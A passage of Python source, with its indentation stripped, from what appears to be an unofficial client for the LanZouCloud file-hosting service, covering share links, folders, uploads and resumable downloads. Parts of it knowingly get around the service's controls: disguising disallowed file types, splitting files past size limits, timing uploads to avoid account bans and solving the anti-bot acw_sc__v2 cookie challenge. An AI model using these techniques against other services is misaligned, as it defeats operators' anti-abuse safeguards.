f_type = f_name.split('.')[-1]
return FileDetail(LanZouCloud.SUCCESS,
name=f_name, size=f_size, type=f_type, time=f_time,
desc=f_desc, pwd=pwd, url=share_url, durl=direct_url)
def get_file_info_by_id(self, file_id) -> FileDetail:
"""通过 id 获取文件信息"""
info = self.get_share_info(file_id)
if info.code != LanZouCloud.SUCCESS:
return FileDetail(info.code)
return self.get_file_info_by_url(info.url, info.pwd)
def get_durl_by_url(self, share_url, pwd='') -> DirectUrlInfo:
"""通过分享链接获取下载直链"""
file_info = self.get_file_info_by_url(share_url, pwd)
if file_info.code != LanZouCloud.SUCCESS:
return DirectUrlInfo(file_info.code, '', '')
return DirectUrlInfo(LanZouCloud.SUCCESS, file_info.name, file_info.durl)
def get_durl_by_id(self, file_id) -> DirectUrlInfo:
"""登录用户通过id获取直链"""
info = self.get_share_info(file_id, is_file=True) # 能获取直链,一定是文件
return self.get_durl_by_url(info.url, info.pwd)
def get_share_info(self, fid, is_file=True) -> ShareInfo:
"""获取文件(夹)提取码、分享链接"""
post_data = {'task': 22, 'file_id': fid} if is_file else {'task': 18, 'folder_id': fid} # 获取分享链接和密码用
f_info = self._post(self._doupload_url, post_data)
if not f_info:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
else:
f_info = f_info.json()['info']
# id 有效性校验
if ('f_id' in f_info.keys() and f_info['f_id'] == 'i') or ('name' in f_info.keys() and not f_info['name']):
return ShareInfo(LanZouCloud.ID_ERROR)
# onof=1 时,存在有效的提取码; onof=0 时不存在提取码,但是 pwd 字段还是有一个无效的随机密码
self._get_response_host(f_info)
pwd = f_info['pwd'] if int(f_info['onof']) == 1 else ''
if 'f_id' in f_info.keys(): # 说明返回的是文件的信息
url = f_info['is_newd'] + '/' + f_info['f_id'] # 文件的分享链接需要拼凑
file_info = self._post(self._doupload_url, {'task': 12, 'file_id': fid}) # 文件信息
if not file_info:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
name = file_info.json()['text'] # 无后缀的文件名(获得后缀又要发送请求,没有就没有吧,尽可能减少请求数量)
desc = file_info.json()['info']
else:
url = f_info['new_url'] # 文件夹的分享链接可以直接拿到
name = f_info['name'] # 文件夹名
desc = f_info['des'] # 文件夹描述
return ShareInfo(LanZouCloud.SUCCESS, name=name, url=url, desc=desc, pwd=pwd)
def set_passwd(self, fid, passwd='', is_file=True) -> int:
"""
设置网盘文件(夹)的提取码, 现在非会员用户不允许关闭提取码
id 无效或者 id 类型不对应仍然返回成功 :(
文件夹提取码长度 0-12 位 文件提取码 2-6 位
"""
passwd_status = 0 if passwd == '' else 1 # 是否开启密码
if is_file:
post_data = {"task": 23, "file_id": fid, "shows": passwd_status, "shownames": passwd}
else:
post_data = {"task": 16, "folder_id": fid, "shows": passwd_status, "shownames": passwd}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def mkdir(self, parent_id, folder_name, desc='') -> int:
"""创建文件夹(同时设置描述)"""
folder_name = folder_name.replace(' ', '_') # 文件夹名称不能包含空格
folder_name = name_format(folder_name) # 去除非法字符
folder_list, _ = self.get_dir_list(parent_id)
if folder_list.find_by_name(folder_name): # 如果文件夹已经存在,直接返回 id
return folder_list.find_by_name(folder_name).id
raw_folders = self.get_move_folders()
post_data = {"task": 2, "parent_id": parent_id or -1, "folder_name": folder_name,
"folder_description": desc}
result = self._post(self._doupload_url, post_data) # 创建文件夹
if not result or result.json()['zt'] != 1:
logger.debug(f"Mkdir {folder_name} error, parent_id={parent_id}")
return LanZouCloud.MKDIR_ERROR # 正常时返回 id 也是 int,为了方便判断是否成功,网络异常或者创建失败都返回相同错误码
# 允许再不同路径创建同名文件夹, 移动时可通过 get_move_paths() 区分
for folder in self.get_move_folders():
if not raw_folders.find_by_id(folder.id):
logger.debug(f"Mkdir {folder_name} #{folder.id} in parent_id={parent_id}")
return folder.id
logger.debug(f"Mkdir {folder_name} error, parent_id={parent_id}")
return LanZouCloud.MKDIR_ERROR
def _set_dir_info(self, folder_id, folder_name, desc='') -> int:
"""重命名文件夹及其描述"""
# 不能用于重命名文件,id 无效仍然返回成功
folder_name = name_format(folder_name)
post_data = {'task': 4, 'folder_id': folder_id, 'folder_name': folder_name, 'folder_description': desc}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def rename_dir(self, folder_id, folder_name) -> int:
"""重命名文件夹"""
# 重命名文件要开会员额
info = self.get_share_info(folder_id, is_file=False)
if info.code != LanZouCloud.SUCCESS:
return info.code
return self._set_dir_info(folder_id, folder_name, info.desc)
def set_desc(self, fid, desc, is_file=True) -> int:
"""设置文件(夹)描述"""
if is_file:
# 文件描述一旦设置了值,就不能再设置为空
post_data = {'task': 11, 'file_id': fid, 'desc': desc}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
elif result.json()['zt'] != 1:
return LanZouCloud.FAILED
return LanZouCloud.SUCCESS
else:
# 文件夹描述可以置空
info = self.get_share_info(fid, is_file=False)
if info.code != LanZouCloud.SUCCESS:
return info.code
return self._set_dir_info(fid, info.name, desc)
def rename_file(self, file_id, filename):
"""允许会员重命名文件(无法修后缀名)"""
post_data = {'task': 46, 'file_id': file_id, 'file_name': name_format(filename), 'type': 2}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def get_move_folders(self) -> FolderList:
"""获取全部文件夹 id-name 列表,用于移动文件至新的文件夹"""
# 这里 file_id 可以为任意值,不会对结果产生影响
result = FolderList()
result.append(FolderId(name='LanZouCloud', id=-1, desc="", now=0))
resp = self._post(self._doupload_url, data={"task": 19, "file_id": -1})
if not resp or resp.json()['zt'] != 1: # 获取失败或者网络异常
return result
info = resp.json()['info'] or [] # 新注册用户无数据, info=None
for folder in info:
folder_id, folder_name = int(folder['folder_id']), folder['folder_name']
result.append(FolderId(folder_name, folder_id, "", ""))
return result
def get_move_paths(self) -> List[FolderList]:
"""获取所有文件夹的绝对路径(耗时长)"""
result = []
root = FolderList()
root.append(FolderId('LanZouCloud', -1))
result.append(root)
resp = self._post(self._doupload_url, data={"task": 19, "file_id": -1})
if not resp or resp.json()['zt'] != 1: # 获取失败或者网络异常
return result
ex = ThreadPoolExecutor() # 线程数 min(32, os.cpu_count() + 4)
id_list = [int(folder['folder_id']) for folder in resp.json()['info']]
task_list = [ex.submit(self.get_full_path, fid) for fid in id_list]
for task in as_completed(task_list):
result.append(task.result())
return sorted(result)
def move_file(self, file_id, folder_id=-1) -> int:
"""移动文件到指定文件夹"""
# 移动回收站文件也返回成功(实际上行不通) (+_+)?
post_data = {'task': 20, 'file_id': file_id, 'folder_id': folder_id}
result = self._post(self._doupload_url, post_data)
logger.debug(f"Move file file_id={file_id} to folder_id={folder_id}")
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def move_folder(self, folder_id: int, parent_folder_id: int=-1) -> int:
"""移动文件夹(官方并没有直接支持此功能)"""
if folder_id == parent_folder_id or parent_folder_id < -1:
return LanZouCloud.FAILED # 禁止移动文件夹到自身,禁止移动到 -2 这样的文件夹(文件还在,但是从此不可见)
folder = self.get_move_folders().find_by_id(folder_id)
if not folder:
logger.debug(f"Not found folder :folder_id={folder_id}")
return LanZouCloud.FAILED
_folders, _ = self.get_dir_list(folder_id)
if _folders:
logger.debug(f"Found subdirectory in folder={folder}")
return LanZouCloud.FAILED # 递归操作可能会产生大量请求,这里只移动单层文件夹
info = self.get_share_info(folder_id, False)
new_folder_id = self.mkdir(parent_folder_id, folder.name, info.desc) # 在目标文件夹下创建同名文件夹
if new_folder_id == LanZouCloud.MKDIR_ERROR:
return LanZouCloud.FAILED
elif new_folder_id == folder_id: # 移动文件夹到同一目录
return LanZouCloud.FAILED
self.set_passwd(new_folder_id, info.pwd, False) # 保持密码相同
ex = ThreadPoolExecutor()
task_list = [ex.submit(self.move_file, file.id, new_folder_id) for file in self.get_file_list(folder_id)]
for task in as_completed(task_list):
if task.result() != LanZouCloud.SUCCESS:
return LanZouCloud.FAILED
self.delete(folder_id, False) # 全部移动完成后删除原文件夹
self.delete_rec(folder_id, False)
return LanZouCloud.SUCCESS
def _upload_small_file(self, task, file_path, folder_id=-1, callback=None) -> Tuple[int, int, bool]:
"""绕过格式限制上传不超过 max_size 的文件"""
if not os.path.isfile(file_path):
return LanZouCloud.PATH_ERROR, 0, True
need_delete = False # 上传完成是否删除
if not is_name_valid(os.path.basename(file_path)): # 不允许上传的格式
file_path = let_me_upload(file_path) # 添加了报尾的新文件
need_delete = True
# 文件已经存在同名文件就删除
filename = name_format(os.path.basename(file_path))
file_list = self.get_file_list(folder_id)
if file_list.find_by_name(filename):
self.delete(file_list.find_by_name(filename).id)
logger.debug(f'Upload file file_path={file_path} to folder_id={folder_id}')
file_ = open(file_path, 'rb')
post_data = {
"task": "1",
"folder_id": str(folder_id),
"id": "WU_FILE_0",
"name": filename,
"upload_file": (filename, file_, 'application/octet-stream')
}
post_data = MultipartEncoder(post_data)
tmp_header = self._headers.copy()
tmp_header['Content-Type'] = post_data.content_type
# MultipartEncoderMonitor 每上传 8129 bytes数据调用一次回调函数,问题根源是 httplib 库
# issue : https://github.com/requests/toolbelt/issues/75
# 上传完成后,回调函数会被错误的多调用一次(强迫症受不了)。因此,下面重新封装了回调函数,修改了接受的参数,并阻断了多余的一次调用
self._upload_finished_flag = False # 上传完成的标志
start_size = task.now_size
logger.debug(f"upload small file: start_size={start_size}")
def _call_back(read_monitor):
if callback is not None:
if not self._upload_finished_flag:
task.now_size = start_size + read_monitor.bytes_read
callback()
if read_monitor.len == read_monitor.bytes_read:
self._upload_finished_flag = True
monitor = MultipartEncoderMonitor(post_data, _call_back)
result = self._post('https://pc.woozooo.com/fileup.php', monitor, headers=tmp_header, timeout=None)
if not result: # 网络异常
logger.debug('Upload file no result')
return LanZouCloud.NETWORK_ERROR, 0, True
else:
if result.status_code == 413:
logger.error(f"Upload file too Large: {result.text}")
return LanZouCloud.FAILED, 0, True # 文件超过限制, 上传失败
result = result.json()
if result["zt"] != 1:
logger.debug(f'Upload failed: result={result}')
return LanZouCloud.FAILED, 0, True # 上传失败
file_id = result["text"][0]["id"]
self.set_passwd(file_id) # 文件上传后默认关闭提取码
if need_delete:
file_.close()
os.remove(file_path)
return LanZouCloud.SUCCESS, int(file_id), True
def _upload_big_file(self, task: object, file_path, dir_id, callback=None):
"""上传大文件, 且使得回调函数只显示一个文件"""
file_size = os.path.getsize(file_path) # 原始文件的字节大小
file_name = os.path.basename(file_path)
tmp_dir = os.path.dirname(file_path) + os.sep + '__' + '.'.join(file_name.split('.')[:-1]) # 临时文件保存路径
record_file = tmp_dir + os.sep + file_name + '.record' # 记录文件,大文件没有完全上传前保留,用于支持续传
uploaded_size = 0 # 记录已上传字节数,用于回调函数
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if not os.path.exists(record_file): # 初始化记录文件
info = {'name': file_name, 'size': file_size, 'uploaded': 0, 'parts': []}
with open(record_file, 'wb') as f:
pickle.dump(info, f, protocol=4)
else:
with open(record_file, 'rb') as f:
info = pickle.load(f)
uploaded_size = info['uploaded'] # 读取已经上传的大小
logger.debug(f"Find upload record: {uploaded_size}/{file_size}")
# def _callback(now_size): # 重新封装回调函数,隐藏数据块上传细节
# nonlocal uploaded_size
# if callback is not None:
# # MultipartEncoder 以后,文件数据流比原文件略大几百字节, now_size 略大于 file_size
# now_size = uploaded_size + now_size
# task.now_size = now_size if now_size < task.total_size else task.total_size # 99.99% -> 100.00%
# callback()
while uploaded_size < file_size:
data_size, data_path = big_file_split(file_path, self._max_size, start_byte=uploaded_size)
code, _, _ = self._upload_small_file(task, data_path, dir_id, callback)
if code == LanZouCloud.SUCCESS:
uploaded_size += data_size # 更新已上传的总字节大小
info['uploaded'] = uploaded_size
info['parts'].append(os.path.basename(data_path)) # 记录已上传的文件名
with open(record_file, 'wb') as f:
logger.debug(f"Update record file: {uploaded_size}/{file_size}")
pickle.dump(info, f, protocol=4)
else:
logger.debug(f"Upload data file failed: code={code}, data_path={data_path}")
return LanZouCloud.FAILED, 0, False
os.remove(data_path) # 删除临时数据块
min_s, max_s = self._upload_delay # 设置两次上传间的延时,减小封号可能性
sleep_time = uniform(min_s, max_s)
logger.debug(f"Sleeping, Upload task will resume after {sleep_time:.2f}s...")
sleep(sleep_time)
# 全部数据块上传完成
record_name = list(file_name.replace('.', '')) # 记录文件名也打乱
shuffle(record_name)
record_name = name_format(''.join(record_name)) + '.txt'
record_file_new = tmp_dir + os.sep + record_name
os.rename(record_file, record_file_new)
code, _, _ = self._upload_small_file(task, record_file_new, dir_id, callback) # 上传记录文件
if code != LanZouCloud.SUCCESS:
logger.error(f"Upload record file failed: code={code}, record_file={record_file_new}")
return LanZouCloud.FAILED, 0, False
# 记录文件上传成功,删除临时文件
shutil.rmtree(tmp_dir)
logger.debug(f"Upload finished, Delete tmp folder:{tmp_dir}")
return LanZouCloud.SUCCESS, int(dir_id), False # 大文件返回文件夹id
def upload_file(self, task: object, file_path, folder_id=-1, callback=None, allow_big_file=False) -> Tuple[int, int, bool]:
"""解除限制上传文件"""
if not os.path.isfile(file_path):
return LanZouCloud.PATH_ERROR, 0, True
file_size = os.path.getsize(file_path)
if file_size == 0: # 空文件无法上传
return LanZouCloud.FAILED, 0, False
elif file_size <= self._max_size * 1048576: # 单个文件不超过 max_size 直接上传
return self._upload_small_file(task, file_path, folder_id, callback)
elif not allow_big_file:
logger.debug(f'Forbid upload big file!file_path={file_path}, max_size={self._max_size}')
task.info = f"文件大于{self._max_size}MB" # LanZouCloud.OFFICIAL_LIMITED
return LanZouCloud.OFFICIAL_LIMITED, 0, False # 不允许上传超过 max_size 的文件
# 上传超过 max_size 的文件
folder_name = os.path.basename(file_path) # 保存分段文件的文件夹名
dir_id = self.mkdir(folder_id, folder_name, 'Big File')
if dir_id == LanZouCloud.MKDIR_ERROR:
return LanZouCloud.MKDIR_ERROR, 0, False # 创建文件夹失败就退出
return self._upload_big_file(task, file_path, dir_id, callback)
def upload_dir(self, task: object, callback, allow_big_file=False):
# dir_path, folder_id=-1, callback=None, failed_callback=None, allow_big_file=False):
"""批量上传文件夹中的文件(不会递归上传子文件夹)
:param folder_id: 网盘文件夹 id
:param dir_path: 文件夹路径
:param callback (filename, total_size, now_size) 用于显示进度
:param failed_callback (code, file) 用于处理上传失败的文件
"""
if not os.path.isdir(task.url):
task.info = LanZouCloud.PATH_ERROR
return LanZouCloud.PATH_ERROR, None, False
dir_name = os.path.basename(task.url)
dir_id = self.mkdir(task.fid, dir_name, '批量上传')
if dir_id == LanZouCloud.MKDIR_ERROR:
task.info = LanZouCloud.MKDIR_ERROR
return LanZouCloud.MKDIR_ERROR, None, False
# the default value of task.current is 1
task.current = 0
for filename in os.listdir(task.url):
file_path = task.url + os.sep + filename
if not os.path.isfile(file_path):
continue # 跳过子文件夹
task.current += 1
code, _, _ = self.upload_file(task, file_path, dir_id, callback=callback,
allow_big_file=allow_big_file)
# if code != LanZouCloud.SUCCESS:
# if failed_callback is not None:
# failed_callback(code, filename)
return LanZouCloud.SUCCESS, dir_id, False
def down_file_by_url(self, share_url, task: object, callback) -> int:
"""通过分享链接下载文件(需提取码)"""
if not is_file_url(share_url):
task.info = LanZouCloud.URL_INVALID
return LanZouCloud.URL_INVALID
if not os.path.exists(task.path):
os.makedirs(task.path)
logger.error(f'down_file_by_url: {share_url}')
info = self.get_durl_by_url(share_url, task.pwd)
logger.error(f'down_file_by_url: {info}')
if info.code != LanZouCloud.SUCCESS:
task.info = info.code
logger.error(f'File direct url info: {info}')
return info.code
resp = self._get(info.durl, stream=True)
if not resp:
task.info = LanZouCloud.NETWORK_ERROR
return LanZouCloud.NETWORK_ERROR
# 对于 txt 文件, 可能出现没有 Content-Length 的情况
# 此时文件需要下载一次才会出现 Content-Length
# 这时候我们先读取一点数据, 再尝试获取一次, 通常只需读取 1 字节数据
content_length = resp.headers.get('Content-Length', None)
if not content_length:
data_iter = resp.iter_content(chunk_size=1)
max_retries = 5 # 5 次拿不到就算了
while not content_length and max_retries > 0:
max_retries -= 1
logger.warning("Not found Content-Length in response headers")
logger.debug("Read 1 byte from stream...")
try:
next(data_iter) # 读取一个字节
except StopIteration:
logger.debug("Please wait for a moment before downloading")
return LanZouCloud.FAILED
resp_ = self._get(info.durl, stream=True) # 再请求一次试试
if not resp_:
return LanZouCloud.FAILED
content_length = resp_.headers.get('Content-Length', None)
logger.debug(f"Content-Length: {content_length}")
total_size = int(content_length)
if share_url == task.url: # 下载单文件
task.total_size = total_size
file_path = task.path + os.sep + info.name.replace("*", "_") # 替换文件名中的 *
logger.debug(f'Save file to file_path={file_path}')
now_size = 0
if os.path.exists(file_path):
now_size = os.path.getsize(file_path) # 本地已经下载的文件大小
task.now_size += now_size
callback()
if now_size >= total_size:
logger.debug(f'File file_path={file_path} local already exist!')
return LanZouCloud.SUCCESS
chunk_size = 1024 * 64 # 4096
last_512_bytes = b'' # 用于识别文件是否携带真实文件名信息
headers = {**self._headers, 'Range': 'bytes=%d-' % now_size}
resp = self._get(info.durl, stream=True, headers=headers, timeout=None)
if resp is None: # 网络异常
task.info = LanZouCloud.NETWORK_ERROR
return LanZouCloud.FAILED
if resp.status_code == 416: # 已经下载完成
logger.debug('File download finished!')
return LanZouCloud.SUCCESS
logger.debug(f'File downloading file_path={file_path} ...')
with open(file_path, "ab") as f:
for chunk in resp.iter_content(chunk_size):
if chunk:
f.write(chunk)
f.flush()
now_size += len(chunk)
task.now_size += len(chunk)
callback()
if total_size - now_size < 512:
last_512_bytes += chunk
# 尝试解析文件报尾
file_info = un_serialize(last_512_bytes[-512:])
if file_info is not None and 'padding' in file_info: # 大文件的记录文件也可以反序列化出 name,但是没有 padding
real_name = file_info['name']
new_file_path = task.path + os.sep + real_name
logger.debug(f"Find meta info: real_name={real_name}")
if os.path.exists(new_file_path):
os.remove(new_file_path) # 存在同名文件则删除
os.rename(file_path, new_file_path)
with open(new_file_path, 'rb+') as f:
truncate_size = 512
f.seek(-truncate_size, os.SEEK_END)
f.truncate()
return LanZouCloud.SUCCESS
def get_folder_info_by_url(self, share_url, dir_pwd='') -> FolderDetail():
"""获取文件夹里所有文件的信息"""
share_url = re.sub(r"lanzou(\w)", "lanzoub", share_url)
if is_file_url(share_url):
return FolderDetail(LanZouCloud.URL_INVALID)
try:
html = requests.get(share_url, headers=self._headers).text
except requests.RequestException as e:
logger.error(f"requests error: {e}")
return FolderDetail(LanZouCloud.NETWORK_ERROR)
if any(item in html for item in ["文件不存在", "文件取消分享了"]):
return FolderDetail(LanZouCloud.FILE_CANCELLED)
if ('id="pwdload"' in html or 'id="passwddiv"' in html or '请输入密码' in html) and len(dir_pwd) == 0:
return FolderDetail(LanZouCloud.LACK_PASSWORD)
if "acw_sc__v2" in html:
# 在页面被过多访问或其他情况下,有时候会先返回一个加密的页面,其执行计算出一个acw_sc__v2后放入页面后再重新访问页面才能获得正常页面
# 若该页面进行了js加密,则进行解密,计算acw_sc__v2,并加入cookie
acw_sc__v2 = calc_acw_sc__v2(html)
self._session.cookies.set("acw_sc__v2", acw_sc__v2)
logger.debug(f"Set Cookie: acw_sc__v2={acw_sc__v2}")
html = self._get(share_url).text # 文件分享页面(第一页)
try:
# 获取文件需要的参数
html = remove_notes(html)
lx = re.findall(r"'lx':'?(\d)'?,", html)[0]
t = re.findall(r"var [0-9a-z]{6} = '(\d{10})';", html)[0]
k = re.findall(r"var [0-9a-z]{6} = '([0-9a-z]{15,})';", html)[0]
# 文件夹的信息
folder_id = re.findall(r"'fid':'?(\d+)'?,", html)[0]
folder_name = re.search(r"var.+?='(.+?)';\n.+document.title", html) or \
re.search(r'user-title">(.+?)</div>', html) or \
re.search(r'<div class="b">(.+?)<div', html) # 会员自定义
folder_name = folder_name.group(1) if folder_name else ''
folder_time = re.search(r'class="rets">([\d\-]+?)<a', html) # 日期不全 %m-%d
folder_time = folder_time.group(1) if folder_time else ''
folder_desc = re.search(r'id="filename">(.+?)</span>', html, re.DOTALL) or \
re.search(r'<div class="user-radio-\d"></div>(.+?)</div>', html) or \
re.search(r'class="teta tetb">说</span>(.+?)</div><div class="d2">', html, re.DOTALL)
folder_desc = folder_desc.group(1) if folder_desc else ''
except IndexError:
logger.error("IndexError")
return FolderDetail(LanZouCloud.FAILED)
# 提取子文件夹信息(vip用户分享的文件夹可以递归包含子文件夹)
sub_folders = FolderList()
# 文件夹描述放在 filesize 一栏, 迷惑行为
all_sub_folders = re.findall(
r'mbxfolder"><a href="(.+?)".+class="filename">(.+?)<div class="filesize">(.*?)</div>', html)
for url, _, _ in all_sub_folders:
url = self._host_url + url
sub_forder_detail = self.get_folder_info_by_url(url, dir_pwd)
sub_folders.append(sub_forder_detail)
# 提取改文件夹下全部文件
page = 1
files = FileList()
while True:
try:
post_data = {'lx': lx, 'pg': page, 'k': k, 't': t, 'fid': folder_id, 'pwd': dir_pwd}
resp = self._post(self._host_url + '/filemoreajax.php', data=post_data, headers=self._headers).json()
except requests.RequestException:
return FolderDetail(LanZouCloud.NETWORK_ERROR)
if resp['zt'] == 1: # 成功获取一页文件信息
for f in resp["text"]:
name = f['name_all'].replace("&", "&")
if "*" in name:
logger.debug(f"Having unexpected file: id={f['id']}, name={name}")
if str(f["id"]).startswith('i'): # 去除不以 i 开头的文件链接
files.append(FileInFolder(
name=name, # 文件名
time=f["time"], # 上传时间
size=f["size"].replace(",", ""), # 文件大小
type=f["name_all"].split('.')[-1], # 文件格式
url=self._host_url + "/" + f["id"] # 文件分享链接
))
page += 1 # 下一页
continue
elif resp['zt'] == 2: # 已经拿到全部的文件信息
break
elif resp['zt'] == 3: # 提取码错误
return FolderDetail(LanZouCloud.PASSWORD_ERROR)
elif resp["zt"] == 4:
continue
else:
return FolderDetail(LanZouCloud.FAILED) # 其它未知错误
# 通过文件的时间信息补全文件夹的年份(如果有文件的话)
if files: # 最后一个文件上传时间最早,文件夹的创建年份与其相同
if folder_time:
folder_time = files[-1].time.split('-')[0] + '-' + folder_time
else: # 没有时间就取第一个文件日期
folder_time = files[-1].time
size_int = sum_files_size(files)
count = len(files)
else: # 可恶,没有文件,日期就设置为今年吧
folder_time = datetime.today().strftime('%Y-%m-%d')
size_int = count = 0
for sub_folder in sub_folders: # 将子文件夹文件大小数量信息透传到父文件夹
size_int += sub_folder.folder.size_int
count += sub_folder.folder.count
folder_size = convert_file_size_to_str(size_int)
this_folder = FolderInfo(folder_name, folder_id, dir_pwd, folder_time,
folder_desc, share_url, folder_size, size_int, count)
return FolderDetail(LanZouCloud.SUCCESS, folder=this_folder, files=files, sub_folders=sub_folders)
def get_folder_info_by_id(self, folder_id):
"""通过 id 获取文件夹及内部文件信息"""
info = self.get_share_info(folder_id, is_file=False)
if info.code != LanZouCloud.SUCCESS:
return FolderDetail(info.code)
return self.get_folder_info_by_url(info.url, info.pwd)
def _check_big_file(self, file_list):
"""检查文件列表,判断是否为大文件分段数据"""
txt_files = file_list.filter(lambda f: f.name.endswith('.txt') and 'M' not in f.size)
if txt_files and len(txt_files) == 1: # 文件夹里有且仅有一个 txt, 很有可能是保存大文件的文件夹
try:
info = self.get_durl_by_url(txt_files[0].url)
except AttributeError:
info = self.get_durl_by_id(txt_files[0].id)
if info.code != LanZouCloud.SUCCESS:
logger.error("Big file checking: Failed")
return None
resp = self._get(info.durl)
# 这里无需知道 txt 文件的 Content-Length, 全部读取即可
info = un_serialize(resp.content) if resp else None
if info is not None: # 确认是大文件
name, size, *_, parts = info.values() # 真实文件名, 文件字节大小, (其它数据),分段数据文件名(有序)
file_list = [file_list.find_by_name(p) for p in parts]
if all(file_list): # 分段数据完整
logger.debug(f"Big file checking: PASS , name={name}, size={size}")
return name, size, file_list
logger.debug("Big file checking: Failed, Missing some data")
logger.debug("Big file checking: Failed")
return None
def _down_big_file(self, name, total_size, file_list, task: object, callback):
"""下载分段数据到一个文件,回调函数只显示一个文件
支持大文件下载续传,下载完成后重复下载不会执行覆盖操作,直接返回状态码 SUCCESS
"""
big_file = task.path + os.sep + name
record_file = big_file + '.record'
if not os.path.exists(task.path):
os.makedirs(task.path)
if not os.path.exists(record_file): # 初始化记录文件
info = {'last_ending': 0, 'finished': []} # 记录上一个数据块结尾地址和已经下载的数据块
with open(record_file, 'wb') as rf:
pickle.dump(info, rf, protocol=4)
else: # 读取记录文件,下载续传
with open(record_file, 'rb') as rf:
info = pickle.load(rf)
file_list = [f for f in file_list if f.name not in info['finished']] # 排除已下载的数据块
logger.debug(f"Find download record file: {info}")
task.total_size = total_size
if os.path.exists(big_file):
now_size = os.path.getsize(big_file) # 本地已经下载的文件大小
task.now_size += now_size
if callback is not None:
callback()
if now_size >= total_size:
logger.debug(f'File file_path={big_file} local already exist!')
# 全部数据块下载完成, 记录文件可以删除
logger.debug(f"Delete download record file: {record_file}")
os.remove(record_file)
return LanZouCloud.SUCCESS
with open(big_file, 'ab') as bf:
for file in file_list:
try:
durl_info = self.get_durl_by_url(file.url) # 分段文件无密码
except AttributeError:
durl_info = self.get_durl_by_id(file.id)
if durl_info.code != LanZouCloud.SUCCESS:
logger.debug(f"Can't get direct url: {file}")
return durl_info.code
# 准备向大文件写入数据
file_size_now = os.path.getsize(big_file)
down_start_byte = file_size_now - info['last_ending'] # 当前数据块上次下载中断的位置
headers = {**self._headers, 'Range': 'bytes=%d-' % down_start_byte}
logger.debug(f"Download {file.name}, Range: {down_start_byte}-")
resp = self._get(durl_info.durl, stream=True, headers=headers)
if resp is None: # 网络错误, 没有响应数据
return LanZouCloud.FAILED
if resp.status_code == 416: # 下载完成后重复下载导致 Range 越界, 服务器返回 416
logger.debug(f"File {name} has already downloaded.")
os.remove(record_file) # 删除记录文件
return LanZouCloud.SUCCESS
try:
for chunk in resp.iter_content(4096):
if chunk:
file_size_now += len(chunk)
bf.write(chunk)
bf.flush() # 确保缓冲区立即写入文件,否则下一次写入时获取的文件大小会有偏差
task.now_size = file_size_now
callback()
# 一块数据写入完成,更新记录文件
info['finished'].append(file.name)
finally:
info['last_ending'] = file_size_now
with open(record_file, 'wb') as rf:
pickle.dump(info, rf, protocol=4)
logger.debug(f"Update download record info: {info}")
# 全部数据块下载完成, 记录文件可以删除
logger.debug(f"Delete download record file: {record_file}")
os.remove(record_file)
return LanZouCloud.SUCCESS
def down_dir_by_url(self, task: object, callback, parent_dir="") -> int:
"""通过分享链接下载文件夹"""
folder_detail = self.get_folder_info_by_url(task.url, task.pwd)
if folder_detail.code != LanZouCloud.SUCCESS: # 获取文件信息失败
task.info = folder_detail.code
return folder_detail.code
# 检查是否大文件分段数据
info = self._check_big_file(folder_detail.files)
if info is not None:
return self._down_big_file(*info, task, callback)
if parent_dir: # 递归下载
task.path = parent_dir + os.sep + folder_detail.folder.name
else: # 父文件夹
task.path = task.path + os.sep + folder_detail.folder.name
task.total_file = folder_detail.folder.count
task.total_size = folder_detail.folder.size_int
# 自动创建子文件夹
if not os.path.exists(task.path):
task.path = task.path.replace('*', '_') # 替换特殊字符以符合路径规则
os.makedirs(task.path)
# 不是大文件分段数据,直接下载
task.size = folder_detail.folder.size
for index, file in enumerate(folder_detail.files, start=1):
task.current = index
code = self.down_file_by_url(file.url, task, callback)
if code != LanZouCloud.SUCCESS:
logger.error(f'Download file result: Code:{code}, File: {file}')
# if failed_callback is not None:
# failed_callback(code, file)
# 如果有子文件夹则递归下载子文件夹
parent_dir = task.path
if folder_detail.sub_folders:
for sub_folder in folder_detail.sub_folders:
task.url = sub_folder.url
self.down_dir_by_url(task, callback, parent_dir)
task.rate = 1000
return LanZouCloud.SUCCESS
# ------------------------------------------------------------------------- #
def set_timeout(self, timeout):
self._timeout = timeout
def get_share_info_by_url(self, f_url, pwd="") -> ShareInfo:
"""获取分享文件信息 和 get_file_info_by_url 类似,少一个下载直链"""
f_url = re.sub(r"lanzou(\w)", "lanzoub", f_url)
if not is_file_url(f_url):
return ShareInfo(LanZouCloud.URL_INVALID)
first_page = self._get(f_url) # 文件分享页面(第一页)
if not first_page:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
first_page = remove_notes(first_page.text) # 去除网页里的注释
if '文件取消' in first_page or '文件不存在' in first_page:
return ShareInfo(LanZouCloud.FILE_CANCELLED)
if ('id="pwdload"' in first_page or 'id="passwddiv"' in first_page or "输入密码" in first_page): # 文件设置了提取码时
if len(pwd) == 0:
return ShareInfo(LanZouCloud.LACK_PASSWORD)
f_size = re.search(r'class="n_filesize">[^<0-9]*([\.0-9 MKBmkbGg]+)<', first_page)
f_size = f_size.group(1) if f_size else ""
f_time = re.search(r'class="n_file_infos">([-0-9 :月天小时分钟秒前]+)<', first_page)
f_time = f_time.group(1) if f_time else ""
f_desc = re.search(r'class="n_box_des">(.*)<', first_page)
f_desc = f_desc.group(1) if f_desc else ""
sign = re.search(r"sign=(\w+?)&", first_page).group(1)
post_data = {'action': 'downprocess', 'sign': sign, 'p': pwd}
link_info = self._post(self._host_url + '/ajaxm.php', post_data) # 保存了重定向前的链接信息和文件名
second_page = self._get(f_url) # 再次请求文件分享页面,可以看见文件名,时间,大小等信息(第二页)
if not link_info or not second_page.text:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
second_page = second_page.text
link_info = link_info.json()
if link_info["zt"] == 1:
f_name = link_info['inf'].replace("*", "_")
if not f_size:
f_size = re.search(r'大小:(.+?)</div>', second_page)
f_size = f_size.group(1) if f_size else ""
